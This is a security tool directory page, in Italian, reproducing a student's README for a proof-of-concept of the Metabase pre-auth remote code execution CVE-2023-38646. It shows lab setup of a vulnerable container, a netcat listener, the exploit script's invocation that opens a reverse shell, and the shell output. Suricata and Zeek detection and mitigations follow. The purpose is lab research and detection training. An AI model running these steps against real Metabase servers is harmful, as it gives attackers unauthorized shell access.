Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Metabase-Pre-Auth-RCE-POC — CVE-2023-38646 | Kitploit
Strumenti/GitHubGitHub/nosrevytsng/metabase-pre-auth-rce-poc
Strumenti DifensiviAnalisi delle VulnerabilitàExploitSicurezza WebPenetration TestingRilevamento IntrusioniApprendimento e FormazioneRisposta agli IncidentiSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubnosrevytsng/metabase-pre-auth-rce-poc

Metabase-Pre-Auth-RCE-POC

CVE-2023-38646

Vedi Repository
5 mesi faNon ancora revisionato

CVE-2023-38646 — Metabase Remote Code Execution (RCE) Proof-of-Concept

Panoramica

Questo repository documenta un progetto di ricerca sulla sicurezza Proof-of-Concept (PoC) che analizza CVE-2023-38646, una vulnerabilità critica di Remote Code Execution (RCE) pre-autenticazione che interessa versioni vulnerabili di Metabase.

L'obiettivo di questo progetto è dimostrare l'intero ciclo di vita di una vulnerabilità reale, tra cui:

  • Comprendere la vulnerabilità e la sua causa principale
  • Riprodurre l'exploit in un ambiente di laboratorio controllato
  • Stabilire una reverse shell sul sistema vulnerabile
  • Osservare il comportamento dell'attacco tramite strumenti di monitoraggio di rete
  • Dimostrare tecniche di detection engineering
  • Proporre strategie di mitigazione difensive

Questo repository è pensato per mostrare competenze pratiche in:

  • Ricerca sulle vulnerabilità
  • Riproduzione di exploit
  • Utilizzo di reverse shell
  • Analisi del traffico di rete
  • Sistemi di rilevamento delle intrusioni
  • Strategie di mitigazione della sicurezza

Contesto della Vulnerabilità

CVE-2023-38646 è una vulnerabilità critica che interessa alcune versioni di Metabase, una piattaforma open-source di business intelligence e analisi.

La vulnerabilità consente a un attaccante di ottenere esecuzione di codice remota non autenticata sfruttando debolezze nel processo di setup o configurazione dell'applicazione.

Dettagli chiave:

  • CVE ID: CVE-2023-38646
  • Gravità: Critica
  • Punteggio CVSS: 9.8
  • Vettore di attacco: Rete
  • Autenticazione richiesta: No
  • Impatto: Remote Code Execution (RCE)

Uno sfruttamento riuscito consente a un attaccante di:

  • Eseguire comandi arbitrari sul sistema di destinazione
  • Stabilire una reverse shell
  • Potenzialmente ottenere il pieno compromesso del sistema

Riferimenti ufficiali:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-38646
  • https://www.metabase.com/

Tecnologie e Strumenti Utilizzati

Questo progetto combina sia strumenti di sicurezza offensiva sia strumenti di monitoraggio difensivo.

Sicurezza Offensiva

  • Python
  • Payload per reverse shell
  • Script di exploit personalizzato
  • Istanza vulnerabile di Metabase

Rilevamento e Monitoraggio

  • Suricata — Intrusion Detection System (IDS)
  • Zeek — Network Security Monitoring (NSM)

Tecnologie Difensive

  • ModSecurity — Web Application Firewall
  • OSSEC — Host-based Intrusion Detection System

Ambiente di Laboratorio

Placeholder — descrivi la tua configurazione di laboratorio

Esempio:

  • Macchina attaccante: Kali Linux
  • Macchina di destinazione: Server Metabase vulnerabile
  • Macchina di monitoraggio di rete: VM per il monitoraggio della sicurezza

PoC di Sfruttamento

Diagramma della Catena di Attacco

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Vulnerable Metabase Instance]
    B --> C[CVE-2023-38646 Exploit]
    C --> D[Remote Code Execution]
    D --> E[Reverse Shell Established]
    E --> F[Command Execution on Target]

Questo diagramma illustra il flusso di attacco ad alto livello utilizzato in questo progetto.

Configurazione del Proof-of-Concept (PoC)

Installazione e Configurazione di Docker:

root@kitploit:~
sudo apt update
sudo apt upgrade -y

sudo apt install docker.io -y

sudo systemctl start docker 
sudo systemctl enable docker

sudo docker run hello-world

Avvio di Docker:

Un'istanza vulnerabile di Metabase Enterprise (v1.44.0) è stata distribuita utilizzando Docker.

root@kitploit:~
sudo docker run -d -p 3000:3000 --name metabase-enterprise metabase/metabase-enterprise:v1.44.0

Questo espone l'interfaccia web di Metabase sulla porta 3000, consentendo l'accesso alla pagina di setup.

Se Docker è già in esecuzione, esegui le seguenti righe di comando per ricominciare da zero:

root@kitploit:~
sudo docker stop metabase-enterprise
sudo docker rm metabase-enterprise

Placeholder 'Docker Setup'

Una volta che il container è in esecuzione, l'interfaccia di Metabase diventa accessibile tramite il browser.

root@kitploit:~
    http://0.0.0.0:3000/setup -or- http://127.0.0.1:3000/setup

La pagina di setup conferma che l'istanza Metabase è attiva e pronta per la configurazione.

Scenario di Sfruttamento 1

BurpSuite

Demo / Documentazione

Placeholder per screenshot o spiegazione

Scenario di Sfruttamento 2 - Script Python

  1. Preparazione del Listener per la Reverse Shell

Prima di lanciare l'exploit, viene avviato un listener Netcat sulla macchina attaccante per ricevere la connessione della reverse shell.

root@kitploit:~
    nc -lvnp 6666

Questo listener attende connessioni in entrata dal server Metabase sfruttato.

Placeholder per screenshot o spiegazione

  1. Esecuzione dell'Exploit Lo script di exploit viene eseguito dalla macchina attaccante.
root@kitploit:~
    python3 CVE-2023-38646-Reverse-Shell.py \   ---> Exploit Name
    --rhost http://192.168.1.136:3000 \         ---> Targer IP Address
    --lhost 192.168.1.137 \                     ---> Attacker's IP Address
    --lport 6666                                ---> Attacker's Listening Port

Il payload esegue un comando che stabilisce una reverse shell verso la macchina attaccante.

  1. Reverse Shell Stabilita Una volta che il payload viene eseguito con successo, l'istanza Metabase vulnerabile avvia una connessione verso la macchina dell'attaccante.

Il listener Netcat riceve la connessione, concedendo all'attaccante accesso shell al sistema.

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$

Per confermare la connessione al dispositivo della vittima:

root@kitploit:~
    whoami

Output:

root@kitploit:~
    connect to [192.168.1.137] from 192.168.1.136
    bash: cannot set terminal process group
    bash: no job control in this shell
    bash-5.1$ whoami
    whoami
    metabase
    bash-5.1$

PoC di Detection Engineering

Questo progetto dimostra anche come l'attività di sfruttamento possa essere rilevata utilizzando strumenti di monitoraggio di rete.

Rilevamento con Suricata

Suricata (IDS) è stato utilizzato per monitorare il traffico di rete alla ricerca di pattern sospetti associati all'exploit.

root@kitploit:~
sudo suricata -i eth0

Placeholder: inserisci screenshot dell'alert Suricata

root@kitploit:~
evidence/detection/suricata_alert.png

Per osservare gli alert in tempo reale, i log di Suricata sono stati monitorati utilizzando:

root@kitploit:~
tail -f /var/log/suricata/fast.log

Placeholder: inserisci screenshot del log Suricata

root@kitploit:~
evidence/detection/suricata_log.png

Per un approccio passivo, è stato utilizzato uno script di notifica personalizzato per generare alert desktop ogni volta che Suricata rileva traffico sospetto.

root@kitploit:~
nohup ./suricata-popup-alert.sh >/dev/null 2>&1 &

Quando l'exploit è stato eseguito, Suricata ha generato alert che indicavano attività sospetta associata al tentativo di sfruttamento di Metabase.

Placeholder: inserisci screenshot del log Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Esempio:

Placeholder: inserisci screenshot del log Suricata

root@kitploit:~
evidence/detection/suricata_noti.png

Analisi di Rete con Zeek

Oltre al monitoraggio IDS, Zeek è stato utilizzato per analizzare il traffico di rete e identificare comportamenti anomali.

Zeek viene avviato con questi comandi per iniziare a catturare e analizzare il traffico di rete:

root@kitploit:~
sudo /usr/local/zeek/bin/zeek -i eth0

Placeholder: inserisci screenshot dell'avvio di Zeek

root@kitploit:~
evidence/detection/zeek.png

Ispezionando i log delle connessioni, è possibile osservare il traffico della reverse shell sulla porta 6666.

root@kitploit:~
192.168.1.136 → 192.168.1.137:6666

Placeholder: inserisci screenshot del log Zeek

root@kitploit:~
evidence/detection/zeek_log.png

Strategie di Mitigazione e Difesa

Diverse strategie di mitigazione possono ridurre il rischio di sfruttamento.

StrategiaDescrizione
Patch ManagementAggiornare Metabase a una versione che corregga CVE-2023-38646
Web Application Firewall (ModSecurity)Filtrare richieste HTTP dannose
Host Intrusion Detection (OSSEC)

Struttura del Repository

root@kitploit:~
cve-2023-38646-metabase-rce-research
│
├── exploit
│   └── metabase_reverse_shell.py
│
├── detection
│   ├── suricata
│   └── zeek
│
├── evidence
│   ├── exploitation
│   ├── detection
│   └── mitigation
│
├── docs
│   ├── report
│   └── presentation
│
└── demo

Riepilogo

Questo progetto dimostra l'intero ciclo di vita dell'analisi e della riproduzione di una vulnerabilità critica reale.

Il PoC mostra:

  • analisi della vulnerabilità
  • riproduzione dell'exploit
  • esecuzione di reverse shell
  • monitoraggio del traffico di rete
  • rilevamento delle intrusioni
  • strategie di mitigazione difensive

L'obiettivo di questo repository è fornire un case study tecnico che illustri sia le pratiche di cybersecurity offensive sia difensive.


🖋️ Autore

Styverson Ng

Bachelor of Information Technology
Artificial Intelligence & Autonomous Systems
Cyber Security & Cyber Forensics

Murdoch University

Scarica lo strumento
Monitorare comportamenti di sistema sospetti
Network Monitoring (Suricata & Zeek)Rilevare pattern di traffico anomali